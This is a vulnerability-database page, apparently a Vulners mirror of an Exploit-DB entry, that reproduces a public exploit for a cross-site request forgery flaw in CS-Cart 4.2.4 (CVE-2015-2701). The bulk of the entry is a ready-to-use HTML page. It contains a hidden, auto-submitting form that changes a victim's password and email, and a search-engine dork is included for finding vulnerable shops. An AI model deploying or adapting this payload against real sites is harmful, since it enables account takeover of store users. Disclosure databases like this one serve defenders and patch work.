Lucene search
+L

CS-Cart 4.2.4 - Cross-Site Request Forgery

🗓️ 11 Mar 2015 00:00:00Reported by Luis SantanaType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 26 Views

CS-Cart 4.2.4 CSRF allows unauthorized password chang

Related
Code
ReporterTitlePublishedViews
Family
CNVD
CS-Cart Cross-Site Request Forgery Vulnerability
26 Mar 201500:00
cnvd
CVE
CVE-2015-2701
25 Mar 201514:00
cve
Cvelist
CVE-2015-2701
25 Mar 201514:00
cvelist
EUVD
EUVD-2015-2791
7 Oct 202500:30
euvd
NVD
CVE-2015-2701
25 Mar 201514:59
nvd
Prion
Cross site request forgery (csrf)
25 Mar 201514:59
prion
# Exploit Title: CS-Cart 4.2.4 CSRF
# Google Dork: intext:"© 2004-2015 Simtech"
# Date: March 11, 2015
# Exploit Author: Luis Santana
# Vendor Homepage: http://cs-cart.com
# Software Link: https://www.cs-cart.com/index.php?dispatch=pages.get_trial&page_id=297&edition=ultimate
# Version: 4.2.4
# Tested on: Linux + PHP
# CVE : [if one exists, or other VDB reference]

Standard CSRF, allow you to change a users's password. Fairly lame but I noticed no one had reported this bug yet.

Exploit pasted below and attached.

<html>
<head>
<title>CS-CART CSRF 0day Exploit</title>
</head>
<body>
<!-- Discovered By: Connection
    Exploit By: Connection
    Blacksun Hacker's Club
    irc.blacksunhackers.com #lobby
-->
    <form action="http://<victim>/cscart/profiles-update/?selected_section=general" method="POST" id="CSRF" style="visibility:hidden">
      <input type="hidden" name="user_data[email]" value="[email protected]" />
      <input type="hidden" name="user_data[password1]" value="CSRFpass" />
      <input type="hidden" name="user_data[password2]" value="CSRFpass" />
      <input type="hidden" name="user_data[profile_name]" value="Concept" />
      <input type="hidden" name="dispatch[profiles.update]" value="" />
    </form>
<script>
document.getElementById("CSRF").submit();
</script>
  </body>
</html>


Luis Santana - Security+
Administrator - http://hacktalk.net
HackTalk Security - Security From The Underground

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Mar 2015 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 26.8
EPSS0.02729
26